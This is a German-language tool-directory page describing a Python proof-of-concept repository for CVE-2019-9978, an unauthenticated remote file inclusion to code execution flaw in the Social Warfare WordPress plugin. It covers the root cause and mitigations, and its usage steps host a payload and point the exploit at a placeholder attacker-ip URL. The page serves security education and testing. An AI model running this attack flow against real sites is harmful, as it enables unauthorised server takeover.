Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2019-9978-RCE-PoC — Ein benutzerdefinierter Python-Proof-of-Concept, der eine Root-Cause-Analyse und Ausnutzung von CVE 2019-9978 (Social Warfare Plugin) zeigt, mit Fokus auf den praktischen RFI-zu-RCE-Angriffsablauf. | Kitploit
Tools/GitHubGitHub/vaidehim55/cve-2019-9978-rce-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHubvaidehim55/cve-2019-9978-rce-poc

CVE-2019-9978-RCE-PoC

Ein benutzerdefinierter Python-Proof-of-Concept, der eine Root-Cause-Analyse und Ausnutzung von CVE 2019-9978 (Social Warfare Plugin) zeigt, mit Fokus auf den praktischen RFI-zu-RCE-Angriffsablauf.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 7 MonatenNoch nicht geprüft

CVE-2019-9978 RCE PoC – Exploit für das Social Warfare WordPress Plugin

Unauthenticated Remote File Inclusion (RFI) zu Remote Code Execution (RCE)


📌 Beschreibung

Dieses Repository enthält einen Python-basierten Proof of Concept (PoC), der die Ausnutzung von CVE-2019-9978 demonstriert, einer kritischen Schwachstelle im Social Warfare WordPress Plugin.

Die Schwachstelle ermöglicht es einem nicht authentifizierten Angreifer, eine Remote File Inclusion (RFI) durchzuführen, die durch das Hosting einer schädlichen Nutzlast auf einem vom Angreifer kontrollierten Server zu Remote Code Execution (RCE)* eskalieren kann.

Dieser PoC wurde in einer kontrollierten WordPress-Lab-Umgebung ausschließlich für Bildungszwecke und autorisierte Sicherheitstests entwickelt und getestet.


🔍 Zusammenfassung der Schwachstelle

  • CVE-ID: CVE-2019-9978
  • Betroffene Komponente: Social Warfare (WordPress Plugin)
  • Betroffene Versionen: ≤ 3.5.2
  • Art der Schwachstelle: Remote File Inclusion (RFI)
  • Auswirkung: Remote Code Execution (RCE)
  • Authentifizierung erforderlich: Nein
  • Angriffsvektor: Remote
  • Schweregrad: Kritisch

🧠 Ursachenanalyse

Das Social Warfare Plugin validiert und bereinigt benutzereingegebene Eingaben, die für die Einbindung externer Inhalte verwendet werden, nicht ordnungsgemäß.
Infolgedessen kann ein Angreifer eine bösartige externe URL bereitstellen, was zu einer nicht authentifizierten Remote File Inclusion führt.

Wenn die eingebundene entfernte Datei ausführbaren PHP-Code enthält, wird dieser im Kontext des WordPress-Servers ausgeführt, was zu einer Remote Code Execution führt.


🔄 Angriffsablauf

root@kitploit:~
Unauthenticated HTTP Request
↓
Remote File Inclusion (External URL)
↓
Malicious Payload Execution
↓
Remote Code Execution (RCE)


🧪 Proof of Concept (PoC)

  1. Der Angreifer hostet eine schädliche Nutzlast auf einem externen HTTP-Server
  2. Der anfällige Social Warfare-Endpunkt bindet die entfernte Datei ein
  3. Die Nutzlast wird auf dem Ziel-WordPress-Server ausgeführt
  4. Der Angreifer erlangt entfernte Befehlsausführung
  5. Das Exploit-Skript automatisiert diesen Prozess zu Test- und Forschungszwecken

▶️ Verwendung

Schritt 1: Nutzlast hosten

root@kitploit:~
python3 -m http.server 8000

Platzieren Sie Ihre Nutzlastdatei (z.B. payload-main.txt) im Serververzeichnis.


Schritt 2: Exploit ausführen

root@kitploit:~
python3 exploit.py <target-site.com> http://attacker-ip:8000/payload-main.txt

🛠 Anforderungen

  • Python 3.x
  • Verwundbare Version des Social Warfare WordPress Plugins
  • WordPress-Testumgebung
  • Lokaler oder entfernter HTTP-Server zum Hosting der Nutzlast

🛡 Schadensbegrenzung & Abwehr

  • Aktualisieren Sie das Social Warfare Plugin auf eine gepatchte Version

  • Deaktivieren Sie Remote File Inclusion:

    root@kitploit:~
    allow_url_include = Off
    
  • Schränken Sie die Handhabung externer URLs in WordPress Plugins ein

  • Setzen Sie eine Web Application Firewall (WAF) mit RFI-Erkennungsregeln ein


⚠️ Rechtlicher Hinweis

Dieses Projekt ist ausschließlich für Bildungszwecke und autorisierte Sicherheitstests bestimmt.

Verwenden Sie diesen Proof of Concept NICHT gegen Systeme ohne ausdrückliche Genehmigung. Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.


🔗 Referenzen & Danksagungen

  • Original-Forscher: Luka Sikic
  • Original PoC Referenz: https://github.com/hash3liZer/CVE-2019-9978
  • Autor / Anpassung: Vaidehi Muluru
Tool herunterladen